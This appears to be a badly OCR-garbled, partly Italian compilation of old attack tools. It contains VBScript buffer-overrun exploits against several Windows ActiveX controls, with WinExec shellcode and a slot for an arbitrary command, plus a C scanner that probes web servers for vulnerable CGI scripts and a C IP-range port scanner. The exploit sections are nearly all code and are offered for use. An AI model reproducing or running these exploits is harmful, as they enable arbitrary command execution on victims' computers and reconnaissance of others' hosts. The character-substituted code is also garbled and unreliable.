e*pstr I e*pstr N +hr.<;/ ODou ma= need to use a different address
e*pstr I e*pstr N +hr.:7"/
e*pstr I e*pstr N +hr.9:F/
O&tac- is slightl= trashedB but N6%s fi* it up o-
e*pstr I e*pstr N +hr.988/ N +hr.988/ N +hr.988/ N +hr.988/ N +hr.988/
OM6L )3IB )&%
e*pstr I e*pstr N +hr.9;@/ N +hr.:<:/
O133 )3IB 9@ .&ize of code/
e*pstr I e*pstr N +hr.9;9/ N +hr.9@@/ N +hr.:</
O%&4 )1! .Aindow &t=le )1! I 9/
e*pstr I e*pstr N +hr."7/
O%&4 )3I .1ddress of command line/
e*pstr I e*pstr N +hr."F/
OM6L )3!B >FF17@#7 .Ain)*ecB Ain@"/
e*pstr I e*pstr N +hr.9"#/ N +hr.@#/ N +hr.@/ N +hr.:<7/ N +hr.9@9/
O+1LL )3!
e*pstr I e*pstr N +hr.:<</ N +hr.:97/
O!6, )1!B )1!
e*pstr I e*pstr N +hr.<9/ N +hr.9@:/
O%&4 )1!
e*pstr I e*pstr N +hr."7/
OM6L )3!B >FF"38+1 .)*it%rocessB Ain@"/
e*pstr I e*pstr N +hr.9"#/ N +hr.:7:/ N +hr.:9:/ N +hr.:8"/ N +hr.9@9/
O+1LL )3!
e*pstr I e*pstr N +hr.:<</ N +hr.:97/
O,eplace with an= command N 7 .automaticall= appended/
e*pstr I e*pstr N ?+1L+.)!)?
O+all e*ploitable method
pdf.setview.e*pstr/
CCJHKscriptJ
SETUPCTL
Hob0ect classidI?clsid(FF:1F>7)C733"C9939C>3#)C771177>@:1F9? id I
?setupctl?J
HKob0ectJ
Hscript languageI?vbscript?JHMCC
msgbo*.?&etupctl 9.7 5=pe Librar= >uffer 6verrun? N +hr.97/ N ?Aritten b=
&hane 4ird?/
e*pstrI?11111111111111111111111111111111
111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
111111111111111?
e*pstr I e*pstr N +hr.:;</ O1ddress in &4)LL;:B Ain@" .FF37;<)>/ of PM% )&%
e*pstr I e*pstr N +hr.<;/ ODou ma= need to use a different address
e*pstr I e*pstr N +hr.:7"/
e*pstr I e*pstr N +hr.9:F/
ON6% for debugging purposes
e*pstr I e*pstr N +hr.988/
OM6L )3IB )&%
e*pstr I e*pstr N +hr.9;@/ N +hr.:<:/
O133 )3IB 9@h .&ize of code/
e*pstr I e*pstr N +hr.9;9/ N +hr.9@@/ N +hr.:</
O%&4 )1! .Aindow &t=le )1! I 89898989/
e*pstr I e*pstr N +hr."7/
O%&4 )3I .1ddress of command line/
e*pstr I e*pstr N +hr."F/
OM6L )3!B >FF17@#7 .Ain)*ecB Ain@"/
e*pstr I e*pstr N +hr.9"#/ N +hr.@#/ N +hr.@/ N +hr.:<7/ N +hr.9@9/
O+1LL )3!
e*pstr I e*pstr N +hr.:<</ N +hr.:97/
O!6, )1!B )1!
e*pstr I e*pstr N +hr.<9/ N +hr.9@:/
O%&4 )1!
e*pstr I e*pstr N +hr."7/
OM6L )3!B >FF"38+1 .)*it%rocessB Ain@"/
e*pstr I e*pstr N +hr.9"#/ N +hr.:7:/ N +hr.:9:/ N +hr.:8"/ N +hr.9@9/
O+1LL )3!
e*pstr I e*pstr N +hr.:<</ N +hr.:97/
O,eplace with an= command N 7 .automaticall= appended/
e*pstr I e*pstr N ?+1L+.)!)?
O,un e*ploit
setupctl.3istnit I e*pstr
setupctl.InstallNow
CCJHKscriptJ
R!5I6C
Hob0ect classidI?clsid(<7)<);39C+7F)C9937C>@F3C7717:8@F#>77? idI?,egAiz6b0?J
HKob0ectJ
Hscript languageI?Lb&cript? JHMCC
msgbo*.?,egistration Aizard >uffer 6verrun? N +hr.97/ N ?Aritten b= &hane
4ird?/
e*pstr I ?Ki
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
1111111111111111111111111111?
OAe overflowed to the ,)5 point of the stac-
ONo NLLOs allowed so ret to HPM% )&%J in &hell;:
e*pstr I e*pstr Q +hr.:;</ O1ddress in &4)LL;:B Ain@" .FF37;<)>/ of PM% )&%
e*pstr I e*pstr Q +hr.<;/ ODou ma= need to use a different address
e*pstr I e*pstr Q +hr.:7"/
e*pstr I e*pstr Q +hr.9:F/
ON6% for debugging purposes
e*pstr I e*pstr N +hr.988/
OM6L )3IB )&%
e*pstr I e*pstr N +hr.9;@/ N +hr.:<:/
O133 )3IB 9@ .&ize of code/
e*pstr I e*pstr N +hr.9;9/ N +hr.9@@/ N +hr.:</
O%&4 )1! .Aindow &t=le )1! I 89898989/
e*pstr I e*pstr N +hr."7/
O%&4 )3I .1ddress of command line/
e*pstr I e*pstr N +hr."F/
OM6L )3!B >FF17@#7 .Ain)*ecB Ain@"/
e*pstr I e*pstr N +hr.9"#/ N +hr.@#/ N +hr.@/ N +hr.:<7/ N +hr.9@9/
O+1LL )3!
e*pstr I e*pstr N +hr.:<</ N +hr.:97/
O!6, )1!B )1!
e*pstr I e*pstr N +hr.<9/ N +hr.9@:/
O%&4 )1!
e*pstr I e*pstr N +hr."7/
OM6L )3!B >FF"38+1 .)*it%rocessB Ain@"/
e*pstr I e*pstr N +hr.9"#/ N +hr.:7:/ N +hr.:9:/ N +hr.:8"/ N +hr.9@9/
O+1LL )3!
e*pstr I e*pstr N +hr.:<</ N +hr.:97/
O,eplace with an= command N 7 .automaticall= appended/
e*pstr I e*pstr N ?+1L+.)!)?
,egAiz6b0.Invo-e,egAizard.e*pstr/
CCJHKscriptJ
EYEDOG
The following code will terminate the browser:
Hob0ect classidI?clsid(7#1F)+#;C8):9C9937C199:C7717+@7<8;11?
idI?e=e?JHKob0ectJ
Hscript languageI?vbscript?JHMCC
msgbo*.?)D)36E 6L) +ontrol module >uffer 6verrun .Local Lersion/? N +hr.97/
N ?Aritten b= &hane 4ird?/
O%adding for the e*ploit
e*pstr I
?1111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
1111111111111111111111111111111111?
O,)5 address .)*it%rocessB >FF"38+1/
e*pstr I e*pstr N +hr.:7:/ N +hr.:9:/ N +hr.:8"/ N +hr.9@9/
O+all e*ploitable method .M&InfoLoadFile/
e=e.M&InfoLoadFile.e*pstr/
CCJHKscriptJ
HHOPEN
This will, again, terminate the browser:
Hob0ect
classidI?clsid(9;73FF8;C<F<1C9939C>#F#C7717+@#@F:;;?
idI?hhopen?JHK6>P)+5J
Hscript languageI?vbscript?JHMCC
msgbo*.?hhopen 6L) +ontrol Module >uffer 6verrun? N +hr.97/ N ?Aritten >=
&hane 4ird?/
e*pstrI?1111111111111111111111111111111
1111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
111?
OAhere the ,)5 address appears to beB ,)5 to )*it%rocess .>FF"38+1/
e*pstr I e*pstr N +hr.:7:/ N +hr.:9:/ N +hr.:8"/ N +hr.9@9/
O)*tra padding to trigger the overrun
e*pstr I e*pstr N
?1111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
111111111111111111111111111111?
O+all e*ploitable methodB note the valid help file
hhopen.6pen4elp ?Ainhlp;:.hlp?B e*pstr
CCJHKscriptJ
SETUPBBS
Again, shuts down the browser:
Hob0ect
classidI?clsid("F7F<7@;C71F7C9937C>+1@C77+78F3"<11#?
idI?setupbbs?JHK6>P)+5J
Hscript languageI?vbscript?JHMCC
msgbo*.?M&N &etup >>& >uffer 6verrun? N +hr.97/ N ?Aritten b= &hane 4ird?/
e*pstrI?1111111111111111111111111111111
1111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111?
O,)5 address .)*it%rocess >FF"38+1/
e*pstr I e*pstr N +hr.:7:/ N +hr.:9:/ N +hr.:8"/ N +hr.9@9/
O5his buffer overrun can be triggered b= either method.
Osetupbbs.v1ddNews&erver e*pstrB true
setupbbs.bIsNews&erver+onfigured e*pstr
CCJHKscriptJ
Test per CGI
Ecco un sorgente che serve a testare le vulnerabilità relative a CGI.
/- 5ested on 6lackEare linux Eith kernel !.0.B" -/
Hinclude Qfcntl.h$
Hinclude Qs>s/t>*es.h$
Hinclude Qs>s/socket.h$
Hinclude Qnetinet/in.h$
Hinclude Qsignal.h$
Hinclude Qstdio.h$
Hinclude Qstring.h$
Hinclude Qnetdb.h$
Hinclude Qct>*e.h$
Hinclude Qar*a/nameser.h$
Hinclude Qs>s/stat.h$
Hinclude Qstrings.h$
Hinclude Qstdio.h$
Hinclude Qstdlib.h$
Hinclude Qunistd.h$
Hinclude Qs>s/socket.h$
?oid main(int argc, char -arg?./)
)
int sock,debugm0;
struct in'addr addr;
struct sockaddr'in sin;
struct hostent -he;
unsigned long start;
unsigned long end;
unsigned long counter;
char foundmsg./ K!00K;
char -cgistr;
char buffer.,0!C/;
int count0;
int numin;
char cgibuff.,0!C/;
char -buff."0/; /- FonYt u think "0 is enoughtZ -/
char -cginame."0/; /- FonYt u think "0 is enoughtZ -/
buff.,/ KI45 /cgi-bin/*hf U55@/,.0OnOnK;
buff.!/ KI45 /cgi-bin/8ount.cgi U55@/,.0OnOnK;
buff.B/ KI45 /cgi-bin/test-cgi U55@/,.0OnOnK;
buff.C/ KI45 /cgi-bin/*h*.cgi U55@/,.0OnOnK;
buff."/ KI45 /cgi-bin/handler U55@/,.0OnOnK;
buff.(/ KI45 /cgi-bin/Eebgais U55@/,.0OnOnK;
buff.#/ KI45 /cgi-bin/Eebsendmail U55@/,.0OnOnK;
buff.D/ KI45 /cgi-bin/Eebdist.cgi U55@/,.0OnOnK;
buff.M/ KI45 /cgi-bin/faxsur?e> U55@/,.0OnOnK;
buff.,0/ KI45 /cgi-bin/htmlscri*t U55@/,.0OnOnK;
buff.,,/ KI45 /cgi-bin/*fdis*al>.cgi U55@/,.0OnOnK;
buff.,!/ KI45 /cgi-bin/*erl.exe U55@/,.0OnOnK;
buff.,B/ KI45 /cgi-bin/EEEboard.*l U55@/,.0OnOnK;
cginame.,/ K*hfK;
cginame.!/ K8ount.cgiK;
cginame.B/ Ktest-cgiK;
cginame.C/ K*h*.cgiK;
cginame."/ KhandlerK;
cginame.(/ KEebgaisK;
cginame.#/ KEebsendmailK;
cginame.D/ KEebdist.cgiK;
cginame.M/ Kfaxsur?e>K;
cginame.,0/ Khtmlscri*tK;
cginame.,,/ K*fdis*la>K;
cginame.,!/ K*erl.exeK;
cginame.,B/ KEEEboard.*lK;
if (argcQ!)
)
*rintf(KOnusage G Js host K,arg?.0/);
*rintf(KOn 7r G Js host -d for debug modeOnOnK,arg?.0/);
exit(0);
0
if (argc$!)
)
if(strstr(K-dK,arg?.!/))
)
debugm,;
0
0
if ((hegethostb>name(arg?.,/)) 3<==)
)
herror(Kgethostb>nameK);
exit(0);
0
*rintf(KOnOnOtOt .896 + 2disk/Ys 8II 8heckerOnOnOnK);
startinet'addr(arg?.,/);
counterntohl(start);
socksocket(12'I345, 6789'65:41;, 0);
bco*>(he-$h'addr, (char -)+sin.sin'addr, he-$h'length);
sin.sin'famil>12'I345;
sin.sin'*orthtons(D0);
if (connect(sock, (struct sockaddr-)+sin, si&eof(sin))T0)
)
*error(KconnectK);
0
*rintf(KOnOnOt . @ress an> ke> to check out the htt*d
?ersion...... /OnK);
getchar();
send(sock, KU41F / U55@/,.0OnOnK,,#,0);
rec?(sock, buffer, si&eof(buffer),0);
*rintf(KJsK,buffer);
close(sock);
*rintf(KOnOt . @ress an> ke> to search C 8II stuff...... /OnK);
getchar();

Ehile(countNN Q ,B) /- 8hange ,B to hoE man> buff.Z/ u ha?e abo?e
-/
)
socksocket(12'I345, 6789'65:41;, 0);
bco*>(he-$h'addr, (char -)+sin.sin'addr, he-$h'length);
sin.sin'famil>12'I345;
sin.sin'*orthtons(D0);
if (connect(sock, (struct sockaddr-)+sin, si&eof(sin))T0)
)
*error(KconnectK);
0
*rintf(K6earching for Js G K,cginame.count/);

for(numin0;numin Q ,0!C;numinNN)
)
cgibuff.numin/ YO0Y;
0

send(sock, buff.count/,strlen(buff.count/),0);
rec?(sock, cgibuff, si&eof(cgibuff),0);
cgistr strstr(cgibuff,foundmsg);
if( cgistr T 3<==)
*rintf(K2ound TT ;)OnK);
else
*rintf(K3ot 2oundOnK);

if(debugm,)
)
*rintf(KOnOn ------------------------On Js On
------------------------OnK,cgibuff);
*rintf(K@ress an> ke> to continue....OnK);
getchar();
0
close(sock);
0
0
"no scanner di DOM!#!O
)cco un sempRlice scanner di dominio in grado di eseguire lo scan su un range di I%.
/----------------------------------
- Fomain 6canner ?!.0 -
- b> UoIs UeaF -
- 2ixed u* the screE> stuff. -
- (8),MMD UoIs UeaF -
- Xou ma> not modif> and -
- then redistribute -
- this source. -
---------------------------------/
Hinclude Qstdio.h$
Hinclude Qs>s/socket.h$
Hinclude Qs>s/t>*es.h$
Hinclude Qs>s/Eait.h$
Hinclude Qnetinet/in.h$
Hinclude Qerrno.h$
Hinclude Qnetdb.h$
Hinclude Qsignal.h$
?oid brk(int no))
*rintf(K\8 Interru*tTOnK);
exit(,);
0
?oid main(int argc, char --arg?)
)
struct hostent -host; /- init stuff -/
struct sockaddr'in sa;
int net, error;
int *ort!B, i, done0;
char -curr'i*, -del, -cm.,00/;
int 1,, 1!, 1B, 1C;
int A,, A!, AB, AC;
int 8,, 8!, 8B, 8C;
*rintf(KOnFomain 6canner ?!.0 b> UoIs UeaFOnUit an> ke> to
end.OnK);
if(argc Q B))
*rintf(K<sageG domscan i*'begin i*'end *ortOnEhere i*'start
eRuals the
beginning I@(ie ,!#.!(.!(.,)Onand i*'end eRuals the ending I@(ie
,C#.!(.!#.,!)O
nand *ort is the *ort to check onOnOnK);
exit(0);
0
signal(6III35, brk);
if(arg?.B/3<==))
0else)
*ortatoi(arg?.B/);
0
/- @arse in the first I*.... -/
curr'i*arg?.,/;
del(char -)strtok(curr'i*, K.K);
1,atoi(del);
del(char -)strtok(3<==, K.K);
1!atoi(del);
del(char -)strtok(3<==, K.K);
1Batoi(del);
del(char -)strtok(3<==, K.K);
1Catoi(del);
/- :ead in 6econd I*... -/
curr'i* arg?.!/;
del(char -)strtok(curr'i*, K.K);
A,atoi(del);
del(char -)strtok(3<==, K.K);
A!atoi(del);
del(char -)strtok(3<==, K.K);
ABatoi(del);
del(char -)strtok(3<==, K.K);
ACatoi(del);
/- VeYre finished *arsing, noE onto the actual scan... -/
8,1,;
8!1!; /- 6aSe Fe; Sa=ue6T -/
8B1B;
8C1C;
for(1C8C;1CQAC; 1CNN))
for(1B8B;1BQAB; 1BNN))
for(1!8!;1!Q8!; 1!NN))
for(1,8,;1,QA,; 1,NN))
s*rintf(curr'i*, KJd.Jd.Jd.JdK, 1,, 1!, 1B, 1C); /-
build the
i* -/
if( ( fork() ) 0)) /-
fork a chi
ld -/
sa.sin'famil> 12'I345;
sa.sin'addr.s'addr inet'addr(curr'i*);
sa.sin'*ort htons(*ort); /-
socket is
set and... -/
net socket(12'I345, 6789'65:41;, 0); /-
create socket -/
if(net Q !))
exit(!);
0
alarm("); /-
Eait " sec
onds until Ee cancel connection -/
error connect(net, (struct sockaddr -)+sa, si&eof sa); /-
attem*t co
nnection -/

error Q 0 Z *rintf(K4rror connecting toG Js JsOnK, curr'i*,
strerror(errno)) G *rintf(K8onnection success atG JsOnK, curr'i*);
shutdoEn(net,
!); /- disconne
ct socket -/
exit(0); /
- exit chi
ld *rocess -/
0

0
0
0
0
gets((char -)i); /- Vait for enter to be *ressed to exit -/
0